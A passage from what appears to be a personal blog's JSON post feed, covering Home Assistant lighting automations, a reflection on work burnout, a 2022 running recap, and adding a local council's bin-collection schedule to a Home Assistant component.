I’ve also configured this delay to only be for after 9pm, so in the morning or other times, the lights will toggle immediately when the switch is flipped.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 alias: "Lighting: Toggle parents light on switch change" description: "" trigger: - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input condition: [] action: - if: - condition: template value_template: "{{ is_state(light, 'on') }}" then: - if: - condition: time after: "21:00:00" then: - delay: hours: 0 minutes: 0 seconds: 10 milliseconds: 0 - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.parents_fan' if trigger.entity_id == 'binary_sensor.parents_bedroom_channel_1_input' else 'light.parents_downlights' }} It’s a bit of a clunky automation because I have nested if actions, but I’ve not thought of a better way to inject the 10s delay conditionally like this.\nInitially, my wife thought this automation was a total gimmick, but she’s come to find it really useful, as her side of the bed is the one furthest from the door (and she’s the one most likely to leave clothes on the floor 😝).\nMaking our ceiling fans smarter Earlier in this series I wrote about making the ceiling fans smarter, but there was one fundamental flaw in the design - the wall switch would cut power to the circuit, turning the light off, but also turning the fan off. It also meant that if we’d turned the light off using a voice command or automation, the switch couldn’t be used to turn it back on. Since I implemented this design, the family, including the kids, are mostly trained on how it works, but sometimes there’d be shouting at Google to turn the light on, nothing happening, and then shouting at me to fix it 🤣 (which generally involved flipping the switch so the circuit was powered again).\nI wanted to fix this, and I’ve been able to do so with a Shelly in Detached Switch mode and an automation.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 alias: "Lighting: Kids fan light switch toggle" description: "" trigger: - platform: state entity_id: - binary_sensor.kid_1_room_input - binary_sensor.kid_2_room_input condition: [] action: - if: - condition: template value_template: | {{ is_state(light, 'on') }} then: - if: - condition: time after: "18:45:00" then: - service: light.turn_on data: effect: Night Light target: entity_id: "{{ lamp }}" - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.kid1_fan' if trigger.entity_id == 'binary_sensor.kid_1_room_input' else 'light.kid2_fan' }} lamp: >- {{ 'light.kid1_lamp' if trigger.entity_id == 'binary_sensor.kid_1_room_input' else 'light.kid2_lamp' }} This automation is a bit more complex as it’s really doing two jobs - changing the state of the fan light, but also conditionally turning on their lamp with the Night Light effect.\nWhen the switch is flipped, we determine if the fan light is currently on or off using the value_template on the if action, looking up the variable light, which is set based on the trigger.entity_id (the ID of the sensor that changed state).
If the light is on, we then check the time to see if it’s after 6:45pm, and if it is, we turn on the lamp with the Night Light effect before turning the fan light off. If the fan light is off, we just turn it on.\nIn my first pass of this I had it calling the script that I use to do the RF blast, but then I was getting weird states when HA would think the light was on when it was actually off, because state was tracked weirdly, but since I created a Template Entity for the lights, we can just use the built-in light.turn_on and light.turn_off services, which will in turn call the scripts, so HA tracks it properly.\nAnd with this design we never actually turn the relay off, so the circuit is always powered, the fan can be run through automations (or voice commands) at any time, and the switch can be used to turn the light on and off as expected.\nI will add that there are occasions that this does fall over, sometimes the Broadlink fails to send the command and then HA thinks the light is off when it isn’t really, so then I have to get into HA, turn it off on the Shelly, fake turning the light off in HA to fix the state sync and then turn the Shelly back on. I can probably fix this with a better placement of the Broadlink device, but it happens infrequently enough that I’m not overly stressed.\nConclusion There’s a few other automations that I have setup for the lights, such as one that will turn all lights off when we go to bed, one to turn on the front porch light when we’re out after dark, but they’re not that interesting.\nI stand by my perspective that smart light bulbs, whether they are wifi, ZigBee, Z-Wave, BLE or other, they really require something additional in the circuit, so they best suited for special situations, in my case, lamps for our kids bedrooms.\nBut Shelly’s to control the lighting circuits, they’re great and work just as I need them to. I’ve only had one drop off the wifi network since installing and I had to issue a reconnect in the Unifi admin portal, but after that I issued them all with static IP addresses and haven’t had any problems.\nI’m really happy that I was able to fix the pain point with our fan lights, and now they work as expected (… mostly), which is definitely improving the Spousal Acceptance Factor!\nIn the future I’d like to add some presence and luminosity sensors in a few of the rooms so we can move away from needing the switches at all, just having the lights adjust to the needs of the room, but that’s a project for another day.\nThe Shelly 2.5’s have Power Monitoring in them and I’ve been contemplating if I could use that feature to work out if the light and fan is on/off, rather than manually tracking state in Home Assistant, but it’ll take a bit of exploring to see if it’s possible to work out the power draw when the light is on vs when the fan is on (and on at different speeds).\n", "id": "2023-01-05-building-a-smart-home---part-6-lighting" }, { "title": "Burnout", "url": "https://www.aaron-powell.com/posts/2023-01-03-burnout/", "date": "Tue, 03 Jan 2023 04:58:12 +0000", "tags": [ "career" ], "description": "2022 was a tough year", "content": "To say that 2022 was a tough year is probably an oversimplification of things, but yeah, 2022 was tough. And it’s not just the case that we’re a few years into a global pandemic for me, 2022 was tougher than that.\nTo put it simply, I’m burnt out.\nBy and large I’m a pretty upbeat and laid back person. 
I remember in high school my mum commenting that she didn’t think she’d ever seen me stressed about an assignment or exam. I mean, I didn’t get stressed about that stuff, because at the end of it, a bad grade was just a bad grade. I’d get over it and move on. I’d learn from it and do better next time. Sure, I wasn’t an A-student, I was a B-student, and that was good enough for me.\nAnd this is something that I’ve taken into my work life as well, don’t stress about the small stuff, there’s always something else to tackle and just keep the big picture in mind and you’ll be fine.\nBecause of this, I’ve always felt that I had a decent grasp on my mental health. I’ve never been diagnosed with anything, but I’ve always felt that I was in a good place mentally. I’ve never had any issues with depression or anxiety, and I’ve never had any issues with burnout.\nUntil now.\nAround and around we go 2022 started with me stepping down from leading the team I’m in at Microsoft and helping to onboard the new manager. While I wasn’t sad to be stepping down, it did hurt to have been unsuccessful in the application for the lead role, after all, it’s hard to not take the “no, you’re not cut out for this” personally.\nThe other thing that made this tough was that it meant yet another manager for me, and once I did the maths I realised that I had a manager retention rate of 5 months. I was just starting my 3rd year at Microsoft and I was already on like my 7th manager. I mean, I’m not going to lie, it’s a bit demoralising to have to keep explaining to new managers what my objectives are, what I’m working on, and what I’m trying to achieve. I even jokingly made the comment to my manager that “we’ll review in 5 months”.\nWell, guess what happened in 5 months? I got another new manager.\nQuick aside - my manager was promoted to fill a role that was vacated by someone who left the company, so they actually became my “skip” (my managers manager) and my new manager was managing a sibling team, they just had their role expanded to also cover the JavaScript team, so it was a complete upheaval.\nAnd this is where things started to get tough.\nHere we go again.\nWith this being my 8th manager in 3.5 years, I’m pretty numbed to the change and it’s been getting harder to get back into the rhythm of things. We’re also going into a new FY, which means we’ve got a new set of objectives coming down, the team above Advocacy had been restructured so we are reporting closer to the CVP, so it’s a whole bunch of change that I just can’t get excited about.\nImpact, or lack there of In October I was doing my 6 monthly self-review (we call them Connects) and I was looking at what I had achieved and being honest, it wasn’t much. Our team didn’t have many clear objectives and Advocacy in general was still in draft mode for what FY23’s objectives were going to be. I was feeling pretty demoralised, and I was starting to feel like I was just spinning my wheels.\nWhen reviewing my Connect with my manager, the feedback was pretty clear that I need to step up my game, and while I’m not on a performance improvement plan, it’s something that could come down the track if I don’t start to show some results.\nNovember was probably my lowest point, but I was still too deep in the hole to see it.\nA holiday and self reflection At the start of December I had a week off, I went up the coast with my wife and kids, plus her extended family. 
I turned off the work profile on my phone (which disables Teams, email, etc.), and didn’t touch a computer all week (except for turning it on so the kids could watch Netflix).\nWhen I got back to work I realised that I hadn’t been at a PC for a week and I hadn’t missed it, being disconnected hadn’t left me thinking “oh, I need to check my email”, it was just a nice break.\nI started to reflect on that and realised pretty quickly that I was burnt out. I was burnt out on the constant change, I was burnt out on the lack of impact, I was burnt out on the isolation of remote work, and I was burnt out on the lack of direction.\nI was burnt out.\nMoving forward After getting back to work I set about defining a few solid goals to achieve before the end of the year. I got into coding on one of the projects our team had been working on and found myself debugging deep into some Golang code, creating PR’s against one of our products and generally feeling like I was doing something with some impact.\nI had a bit more of a break over the festive season and did some more reflecting on what I want to achieve in 2023. I don’t have solid goals yet, just a sketch out of what I believe I can do, and I’m going to be working on that over the next few weeks.\nBurnout doesn’t go away overnight, and I’m by no means “cured”, I still catch myself staring off into space at times, but I’m starting to feel like I’m on the right track.\nWrapping up I’m not sure if this post will resonate with anyone, but I felt like I needed to get it out there. I’ve been feeling pretty low for the last few months, and I’ve been trying to keep it to myself, but I think it’s time to be open about it.\nDon’t be afraid to ask for help, and don’t be afraid to ask for a break. I’m not saying that you should take a break from work, but I am saying that you should take a break from the things that are causing you stress. If you’re feeling burnt out, take a step back and figure out what’s causing it, and then work out how to fix it.\nBanner Image by Ryan Snaadt.\n", "id": "2023-01-03-burnout" }, { "title": "1500km", "url": "https://www.aaron-powell.com/posts/2023-01-02-1500km/", "date": "Mon, 02 Jan 2023 00:35:02 +0000", "tags": [ "running" ], "description": "The story of my running in 2022", "content": "Well, 1,565km’s to be exact, but who’s really counting (oh right, me, that’s the point of this post!).\nIt’s another year down so I thought I’d share my running journey from 2022 as it was very much a year of milestones for me, not only is 1500km’s the most km’s I’ve done in a single year, I also managed to get PB’s on all races I entered and I was (mostly) injury free.\nThe raw stats As the saying goes, if it’s not on Strava, it didn’t happen, and according to Strava I ran a total of 1565km’s across 176 activities, totalling 129 hours and 17 minutes, with an elevation gain of 12,719 meters.\nLike I mentioned last year Strava is a bit of a pain to get overly specific with, but I now have 12 months of data in Garmin to look at as well. According to this, the largest running month for me was January at 177.7km for the month, followed closely by August at 175.9km. This tracks as in January I was finishing my “run at least 5km a day” which I kept up for ~3 weeks, and August was the final training for City2Surf.\nRaces The big change for 2022 was that races were back. 
Races are something that I’d missed from the peak pandemic, so I set myself some goals, a sub-95 half marathon and sub-60 City2Surf (which I’d done in 2019, so it was more proof I could do it again).\nFor me, City2Surf was my A race, the one that I was targeting directly, and I ran the SMH and Blackmores half marathons in addition.\nSMH Half Marathon This was a bit of a spur of the moment event for me. Being in May, SMH is early enough that it’s an indicator for City2Surf (and where to adjust training) but also well enough into the year that I’ve had some time to get some fitness baseline setup.\nBut SMH sucks, it’s a really hard race and as much as I enjoy it, I also really hate doing it.\nThe course for SMH is through Sydney CBD, starting at Hyde Park, zig zagging through the CBD before heading out to Pyrmont, turning around, and then at ~15km in the hills start, with about a 30m vertical climb, and then it just goes up and down constantly from there.\nAs I mentioned, this was a spur of the moment event for me. It’s the first of the big Sydney running events in a calendar year, but I wasn’t sure I’d sign up for it. Talking with some running friends I was sure I could do it (and I did a few half marathon distance long runs at the start of 2022), but having not raced for nearly 3 years, I was unsure if I was mentally ready. But I decided to bite the bullet and sign up, best shake off race nerves before City2Surf!\nOne of my friends I run with was running similar pace to me and was targeting a sub-95 time so I thought I should be able to do that - it’s holding a 4:30 min/km pace and my training runs saw me hitting that with reasonable consistency.\nCome race day I went to find my friend, but he’d gotten into the starting pack before me and was near the front, so I did my warm up of a 1km job, followed by some dynamic stretching and sprints at progressively faster pace, then I settled into the back of the starting group. I wasn’t going to run with the 95 pacer anyway, I don’t like running with pacer groups (I prefer to do my own thing), so it wasn’t that much of a bother.\nThe race got underway, I settled myself into a pace/cadence that was felling good for my body - I don’t look at my watch/wearing a timing print-out, I prefer to run what my body feels to be right and if I miss a pace goal, then clearly I wasn’t ready for it. I paced the 100 min pacer around 8km, clearly I’m holding a solid pace above 100 minutes, and then caught the 95 pacer a few km later. This is good, I’m on pace for sub-95 if I’m passing the pacer. I saw my friend pass me on the return, he wasn’t that far ahead so I pushed a bit and caught him, cheered him on and then dropped away - despite all our banter beforehand and him being convinced I’d out run him, he was clearly running stronger than me and I wasn’t going to be able to keep pace.\nAnd then it went to shit.\nAt the 15km mark, after a few km of flat running, you turn sharply and go up, and up, and up. It was clear that I wasn’t prepared for hills and I knew this was going to be a tough finish to the race. I went from a 4:08 min/km pace to a 4:54 min/km over two km’s. Now sure, there’s expected slowdown when you hit hills, but even reviewing the GAP (Gradient Adjusted Pace) I was behind 4:30 which I needed for sub-95.\nWhen you hit 19km you go downhill into Mrs Macquarie’s Chair, before a hairpin turn and heading back up and out. 
I summoned the last bit of adrenaline I had left, shouted some encouragement to the runners around me who were clearly in the same boat as me, then prepared for the climb… and then I heard a chirpy voice shouting encouragement behind me. A quick look back to confirm, that yep, there’s the 95 min pacer coming up behind me. Shit, I’d left them behind nearly 10km ago and that confirmed just how much I’d dropped pace.\nIt was now or never, I pushed as hard as I could for the final straight, rounded the last corner, crossed the finish line (and stopped my watch, can’t risk overage on the activity!), and sat down, exhausted.\nI did it - 94:09, I broke my 95 goal.\nMy friend came over and congratulated me, he’d run a 92, so I was glad I didn’t stick with him! Then I went to find my family who’d come in to cheer my finish, my youngest was super excited cuz he’d seen Spiderman finish and I’d beaten Spiderman, so I was kind of a big deal!\nIt did take me several days to be able to walk properly again, but I’d gotten my goal and some useful insights on where I was lacking as I looked towards my next race, City2Surf.\nCity2Surf The number one takeaway from SMH was that I wasn’t hill-fit, and that’s something I’d need to work on for City2Surf, because while SMH is a rough finish with the hills, City2Surf is unforgiving the whole way, there’s maybe 2km of flat across the 14km course, everything else is either up or down.\nI rejigged my training plan - I was running four times a week, Wednesday became hills (I mapped a 3.5km loop at my local park that was up and down constantly), Friday would be speed work (I stopped RunLab as I wasn’t finding it valuable anymore), Saturday was parkrun (generally pushing both kids in a pram) and Sunday was a long run (generally around 15km). As City2Surf got closer, I doubled the hill session to run ~7km up and down, ensuring that I was as strong as I could possibly be on the hills.\nOn race day I stuck to the same plan as in 2019, hang to the back of the wave I’m in, rather than try and run in the pack. It’s probably more psychological than anything, but City2Surf is a huge event, 46,000 people ran/jogged/walked it in 2022, and in my wave there was easily several thousand and there’s a large variety of runners there, so by hanging back I hope for the pack to thin a bit and I can find a path through, rather than getting suck behind people who aren’t going at the pace I’m going.\nI found my groove early, there was a lot of people traffic to dodge, but the legs felt good and around the 5km mark, when you hit one of the flattest sections, I knew I was running fast and strong (looking at the analysis, I did a 3:45 min/km!) and then we get to Heartbreak Hill. Heartbreak Hill is the hill of City2Surf, it’s ~1.4km (just under 1 mile) with ~85m elevation gain on a 6% grade and it’s about the midway point. A good rule of thumb is how you feel at the top is how the race will pan out and in 2019 I was done by the top of the hill (I still don’t know how I held on to the sub-60) but this year I crested it and felt good. Sure, my legs were burning but they still felt strong, and I knew this would be a good time, in fact, looking at the GAP for the segment, I ran a 3:59 min/km, which is insane for a hill like that.\nFeeling good I hit the back half of the course confident. 
I pushed through the next couple of hills, waved to a friend who’d come out to cheer me on, past someone I know from parkrun (who is a strong runner and consistently beats me there), got horribly depressed when you see the finish line only to have to run past it before doubling back (honestly, that’s just mean!) and crossed the finish line with a 57:24.\nThat’s 2 minutes faster than my 2019 PB, so yeah, crushed it.\nBlackmores Half Marathon After doing City2Surf I was talking to other running friends and I kept getting asked if I was going to aim for sub-90 at Blackmores. I generally shrugged it off as not happening, after all, I only just managed to get sub-95 at SMH, and while I ran a pace a City2Surf to achieve it, I couldn’t have kept that up for another 7km.\nBut it nagged at the back of my mind, maybe I could. So I decided to push my training a bit harder, there was about 6 weeks to go, enough time to build a bit more in. I added a 2km tempo run onto the hills session and extended the length of the speed sessions to be longer segments at pace.\nI felt good, so I decided I would go for it as a stretch goal, with sub-95 being my main objective. Also, Blackmores should be easier to do it than SMH, it’s an “easier” course, with a bit of hills at the start of the race, but once you hit the final third it’s dead flat, and while I was now stronger on the hills, I know that on flat I can really push it.\nThen, with about a week to go I felt a twinge in my calf. Shit, I know what this is, it’s the feeling I had last year, I’m on the edge of a calf strain. I decided that I would still run, I’d put in the training, I should be able to hold it together.\nOn race day I ended up a bit later than planned to the start area (extra bathroom stop along the way!) which meant that I wasn’t able to do the warmup I wanted, only a short jog and a few dynamic stretches, before having to get into the starting area, so my injured calf wasn’t warmed up properly. My race plan was to take the first few km easy as they are a bit hilly (you start from Luna Park, run uphill to the Harbour Bridge and then over it, very picturesque) and that’d give my leg a chance to warm up, knowing I could regain time on the final third once we hit the flat.\nOf course I didn’t follow that. My first km was just under 4:30, with the next being 4:11 and a 3:54 3rd km. This explains why at about 10km I knew I’d torn my calf. I momentarily entertained the idea of calling it quits but I’d come this far, only another 11km to go and I can book a physio appointment!\nWith about 5km to go I broke my “no look” rule and snuck a look at my watch, partially because I needed to know how much longer I was likely to suffer for, and I was shocked, I was under the pace I needed to hit sub-90! I could do this, only 20 more minutes. Adrenaline surged and I pushed on, one step at a time.\n87:46. I not only did it, I’d blown past sub-90! I called my wife and kids (who were still in bed) excited but exhausted. I grabbed a drink, headed up to the recovery area and got a massage then booked into the physio for 9am the following day 🤣.\nThe physio confirmed I’d torn my calf. Thankfully it wasn’t a particularly bad one and as the physio said, I got a PB so it was worth it!\nparkrun A key part of my running is parkrun, a free, timed 5km event that happens at parks every Saturday around the world. 
I try to make it every weekend, even when I’m traveling I’ll look for where the nearest parkrun is (I rode 8km through Copenhagen to do a parkrun once).\nI started the year with North Woolongong parkrun and ran a 20:22, which I found an amusing start to the year. I hit my 250th parkrun in January at my local parkrun, which is a huge milestone.\nIn September we were holidaying in Mudgee and I decided to run the parkrun there. It was a rainy morning and about 4c, so my wife thought I was mad. But, I managed to run my fastest parkrun ever with a 19:19!\nThen, to cap off the year, I finally managed to get a 1st finisher on Christmas Eve in Queenbyane, on what is a very hilly course.\nI doubt I’ll see this kind of “success” in 2023 at parkrun, I’ve set the bar pretty high for myself…\nTraining So I’ve had some pretty big wins in terms of events this year, and that begs the question, what’s changed?\nThe short answer is focus - I’ve trained in a more focused way on specific outcomes and on where I knew I had the biggest shortcomings. Weird that seems to have paid off right! 😅\nMy wife and I alternate workout days, each doing four days per week (we overlap Saturday with both of us at parkrun), and my week looks like this:\nWednesday: Hills. I aim for around 10km when getting to the end of training before tapering for a race Now that races are done for the year, Wednesday is more of a social run with some friends at an easy pace, but we still hit around the 10km mark. Friday: Speed. I was doing RunLab on Friday but ultimately I reached the end of what I felt of was getting out of the program in the middle of the year and started creating my own program. The sessions range from short distance (400m) as hard as I can go, up to 1 mile around threshold pace. With warmup and cool down, this can get over 10km, but that’ll depend on the segment lengths. For this I try and do it on a flat area, and have some parks nearby that are good for that Saturday: parkrun. Since both my wife and I do it, and our kids don’t want to run it, I take the pram, so I consider it a strength training session! Trust me, when you’ve got ~60kg of kids and pram, going up Sydney Park Hill (which is in the middle of our “home” parkrun) and then down again is a good workout through the legs. Sunday: Long, easy run. Ok, maybe I should say “easy”, as I have had a tendency to run it a bit too fast. But still, it’s generally around 15km and I aim to run just what feels good, without any sort of pushing myself. After injuring myself at Blackmores, my physio reiterated that I really should be doing some strength work, and no, pushing the pram or picking up my kids doesn’t count. So, I’ve started hitting the gym. I’ve replaced Friday’s speed session with a gym session, as I don’t really need to do speed work outside of race training, instead I do a program of:\nJog to the gym warmup Leg press Lunges Leg curls Step ups Calf raises Plank Squats Longer jog home And, yes, it seems to be paying off. So I guess that the physio was right… I’ve kept this up for a few months now, so we’ll see what the impact is next year.\nShoes The other major “change” I made this year was shoes. One thing I like about running is that it’s reasonably cheap. You buy a pair of shoes, some workout gear, and that’s your expenses done. I only ever own one pair of shoes at a time and I’ll run them into the ground. Annoyingly at the end of 2021 I had my shoes stolen from out the front of an apartment we were holidaying at. 
Granted, these shoes had done ~1200km and were ready for retirement, but I was aiming to run the year out in them and crack a fresh pair for 2022. And really, who steals a pair of beat up old runners? The smell alone should have warned the thief off!\nFor the last few years my go-to shoe has been the Adidas Adizero Adios (I’ve run both the 4’s and 5’s), and had a fresh pair of them waiting at home to get me started. I find them a good all round shoe for the kind of running I do. But one of my running friends had a lot of excess shoes (from doing reviews of them), and is the same size as me, so they offered me a few pairs to try out.\nThere are two main pairs that I’ve added to my rotation, Saucony Triumph 19 and Saucony Endorphin Pro v1. The Triumph’s are what I use for my long runs, they have a huge amount of cushioning in them, making them very soft and cushy, ideal for a long distance run at an easy pace. The drawback of them is they are harder to “go fast” in, as they absorb so much in each step that you don’t get the same return on effort as you do in a less padded shoe (I also find they lack much tread, making them very slippery in the rain, but that could be cuz they are a bit warn).\nThe Endorphin Pro’s are the complete opposite, these are racing shoes. They are of the style with a carbon plate through the base of them, making them ultra ridged, and giving you a lot of return momentum for each step. I only tend to crack them out just before a race to get use to them again, the rigidity makes them feel very different through the ankle and it takes time to get use to the change in movement. For all the races I did this year, I wore the Endorphin Pro’s. Have they made a difference? it’s hard to tell, as I don’t have comparable data (not like I also ran the race on the same day in different shoes). Yes, I beat my PB’s in each race, some by considerable margins, but it’s also been several years of progressively increasing running and training, which will have had an impact.\nBut hey, now I’m a shoe snob who has multiple pairs of runners and when I’m going out I select the “right” shoe for the kind of run I’m doing… I guess it was bound to happen 😅.\nConclusion 2022 was good to me as a runner. I really never though I’d be in a position to run a sub-90 half marathon, but I did it and I can see the impacts of proper training schedules. I haven’t gone as far as getting a personalised plan (yet…), but the past few years have helped me learn more about judging paces when running so I can pace myself better, and how to put together a session for myself that meets what I’m trying to achieve.\nI’m not sure what 2023 will bring, I’m currently nursing a sore calf as I strained it a bit chasing some Strava crowns just before New Years (I managed to get them though, so that’s all that matters), so it’ll be a lighter start to the year. 
I’m also going to be seeing a surgeon about the varicose veins in my right leg, as I’m starting to notice the difference in swelling between them, so that may see me out of action for a bit.\nThe intent is to keep to the three days of running plus one day at the gym, and I hope to target the same three races again, to prove that 2022 wasn’t just a fluke year in running, but for that I’ll have to work out how to fit an extra day of running in.\nSo fingers and toes crossed, and we’ll see what this post looks like in 12 months time.\n", "id": "2023-01-02-1500km" }, { "title": "Building a Smart Home - Part 5 Bin Day", "url": "https://www.aaron-powell.com/posts/2022-11-07-building-a-smart-home---part-5-bin-day/", "date": "Mon, 07 Nov 2022 05:43:39 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "What day do the bins go out? What bins are we putting out this week?", "content": "Where I live, we have three bins that we can put out, depending on the week, red for household rubbish, yellow for mixed recycling and green for garden waste. The red bin goes out each week, but the yellow and green alternate every other week, so you need to know which one it is that week and like a lot of people, I never know which week it is, so I sneakily wait until my neighbours put their bins out and then I put mine out, following their colour choices!\nBut really, this is the kind of quality-of-life improvement that I should be able to solve with a smart home, so I decided to add it.\nGetting the data into Home Assistant The first step is to get the data into Home Assistant. Thankfully, HA has a calendar feature, so it’s just a matter of having something that goes into that feed and then we should be all sorted right?\nMy friend Tatham pointed me to Waste Collection Schedule, a custom component for Home Assistant that does exactly what I need. Well, it would if my council was there… No biggie, I’ll just add it myself.\nAdding a new council The first step is to find a feed for your local council that has the data available. I live in the Inner West Council and they have a waste calendar on their website, which you can pop in your address and get a display like this:\nGreat, it’s a calendar, or at least providing data that can be mapped to a calendar, all I need to do now is find the endpoint that that’s calling and I’m all set. I set about digging through how it worked and figured the best place to start was the network tab in my browser:\nOh dear… It’s an ASMX web service, which is something from old-school ASP.Net WebForms days, which I haven’t used in a long time. I’m not sure if it’s still a thing, and it’s a HTTP POST, so it’s going to be a bit tricky to break down, but let’s try anyway. 
We’ll start with the payload:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 { "schedulerInfo": { "ViewStart": "/Date(1667052000000)/", "ViewEnd": "/Date(1670076000000)/", "EnableDescriptionField": true, "MinutesPerRow": 30, "TimeZoneOffset": 36000000, "VisibleAppointmentsPerDay": 2, "UpdateMode": 0, "moduleID": 58152, "userID": 0, "filterPermissions": 6, "filterGroups": "", "filterApptTypes": "" } } Oh dear… ASP.Net serialized DateTime strings, this just gets better… Let’s check out the response:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 { "d": [ { "__type": "Telerik.Web.UI.AppointmentData", "ID": 752, "EncodedID": "/wEC8AXS5ORUZvoJJiHck83LcbtXaRd/GhDgLBkE78COC0wM0g==", "Start": "/Date(1584540000000)/", "End": "/Date(1584626400000)/", "Subject": "Garbage Bin", "Description": "Thursday by 4.30pm", "RecurrenceState": 1, "RecurrenceParentID": null, "EncodedRecurrenceParentID": null, "RecurrenceRule": "DTSTART:20200318T140000Z\\r\\nDTEND:20200319T140000Z\\r\\nRRULE:FREQ=WEEKLY;INTERVAL=1;BYDAY=TH\\r\\n", "Visible": false, "TimeZoneID": "AUS Eastern Standard Time", "Resources": [ { "__type": "Telerik.Web.UI.AppointmentData", "ID": 752, "EncodedID": "/wEC8AXS5ORUZvoJJiHck83LcbtXaRd/GhDgLBkE78COC0wM0g==", "Start": "/Date(1584540000000)/", "End": "/Date(1584626400000)/", "Subject": "Garbage Bin", "Description": "Thursday by 4.30pm", "RecurrenceState": 1, "RecurrenceParentID": null, "EncodedRecurrenceParentID": null, "RecurrenceRule": "DTSTART:20200318T140000Z\\r\\nDTEND:20200319T140000Z\\r\\nRRULE:FREQ=WEEKLY;INTERVAL=1;BYDAY=TH\\r\\n", "Visible": false, "TimeZoneID": "AUS Eastern Standard Time", "Resources": [ { "__type": "Telerik.Web.UI.ResourceData", "Key": 385, "Text": "Garbage Bin (red lid) - MarrZone15B", "Type": "AppointmentTypeID", "Available": true, "EncodedKey": "/wECgQO8KfWqRezwxWlACrW+iXp1yPOARWUInQEsFugq6PPmWA==", "Attributes": { "name": "Garbage Bin (red lid) - MarrZone15B", "backcolour": "#EE0031", "bordercolour": "" } }, { "__type": "Telerik.Web.UI.ResourceData", "Key": 3, "Text": "Public", "Type": "PrivacyID", "Available": true, "EncodedKey": "/wELKYwBQ01Eb3ROZXQuQ29tbW9uLmVjQ2FsZW5kYXIuQ29tbW9uLkVudW1lcmF0aW9ucytBcHBvaW50bWVudFByaXZhY3ksIENNRG90TmV0LkNvbW1vbiwgVmVyc2lvbj0xMS41LjE1LjU2LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwDHumVwtOrf2dqNRWC26d+4JZSY0Owz4D1NkVQi9COlYk=", "Attributes": {} }, { "__type": "Telerik.Web.UI.ResourceData", "Key": 2, "Text": "Implementation Staff", "Type": "People", "Available": true, "EncodedKey": "/wECAr6LF7CwU/mH1D0Fnnna3lyFqUBUtQQ7fRbNCKf+z84Q", "Attributes": { "strFirstName": "Implementation", "strLastName": "Staff" } } ], "Attributes": { "PrivacyID": "3", "tt_location": "", "UserName": "Implementation Staff", "tt_apttype": "Garbage Bin (red lid) - MarrZone15B", "tt_subject": "Garbage Bin", "OrganiserUsers": ",", "AllowDelete": "False", "AllowEdit": "False", "tt_aptprivacy": "3", "AppointmentTypeID": "385", "ViewerGroups": "", "ExternalURLOpenNewWindow": "False", "OrganiserGroups": "", "AttendeeUsers": "", "ExternalURL": "", "AttendeeGroups": "", "Location": "", "UserID": "2", "ViewerUsers": "", "tt_description": "Thursday by 4.30pm", "SyncWithExchange": "False", "Title": "Garbage Bin" }, "Reminders": [] } // snip OH DEAR… I’ve truncated the response here (it’s over 1000 lines!) 
and having spent some time going through it, it’s not something I could figure out (the first record’s start/end date is back in 2020 from what I can deserialize!). Which isn’t that surprising - the data is designed to be used by the Telerik Calendar control (from what I can determine), so it’s really only intended for use within that control.\nI spent a few evenings trying to make sense of the data structures in the JSON payload, to work out what I could change in the POST body to maybe get more useful data, but it was feeling like a mostly pointless effort… time for a new approach.\nAdding a new council - take two Since the website isn’t going to be much use, it’s time to rethink the strategy for how I can get the data. Some web searching and digging through the council website (yes, I read a lot of the council website!) was leading me nowhere, until I re-read the original waste calendar and noticed that there’s an app. First off - why do I need an app for my local council? But I digress…\nIf I can get the waste schedule on the mobile app, it’s going to have an API that’s easier for me to parse. I installed the app on my phone and now it’s time to work out what it’s doing. This is something I’ve done in the past using Telerik Fiddler; basically you use Fiddler on your computer as a proxy, configure your mobile to use your computer as the proxy, and then monitor the network traffic (here’s a guide from Telerik).\nFor some reason I couldn’t get the root certificate installed, so I wasn’t seeing any of the traffic contents, but I was seeing the routes it was hitting, and what I saw was a bunch of requests to https://marrickville.waste-info.com.au. Unfortunately, this is a CMS that I don’t have the login details for, so it was feeling like a dead end again.\nI decided to have a poke around some of the other Australian council implementations in the HACS component when I stumbled onto one that looked interesting - it was hitting a waste-info.com.au address too. It wasn’t marrickville, but it was still on there, so maybe this CMS is something I can figure out by going through other implementations.\nThrough browsing the code, it seemed like the data is gathered by chaining requests across a series of endpoints: first we get the suburb ID from the localities, then the street ID, and then a property ID, before finally getting the details for the property! Using the browser, I tested following each endpoint and eventually I got to:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 { "collection_day": 4, "collection_day_2": null, "zone": "zone 15", "shs": null, "collections": [ { "id": 19, "bin_type": "recycle", "recurrence": "fortnightly", "collection_day": 5, "next_collection_date": "2022-11-18" }, { "id": 20, "bin_type": "organic", "recurrence": "fortnightly", "collection_day": 5, "next_collection_date": "2022-11-11" } ] } Success!\nI copied the reference implementation, tested it locally and sent a PR, so now Inner West Council has been added!\nAdding to Home Assistant Now that the component supports my location (I manually added the Python file while I waited for the PR to merge in), it was time to add it to my Home Assistant dashboard.\nThat’s what I display on the dashboard.
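One thing not shown above: the component itself needs a source entry in configuration.yaml before any of the sensors exist. A minimal sketch of what that looks like - the source name and the address arguments here are assumptions on my part, so check the Waste Collection Schedule docs for the exact values for your council:

waste_collection_schedule:
  sources:
    - name: innerwest_nsw_gov_au   # assumed source module name for Inner West Council
      args:
        suburb: Marrickville        # placeholder address details
        street_name: Example Street
        street_number: "1"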
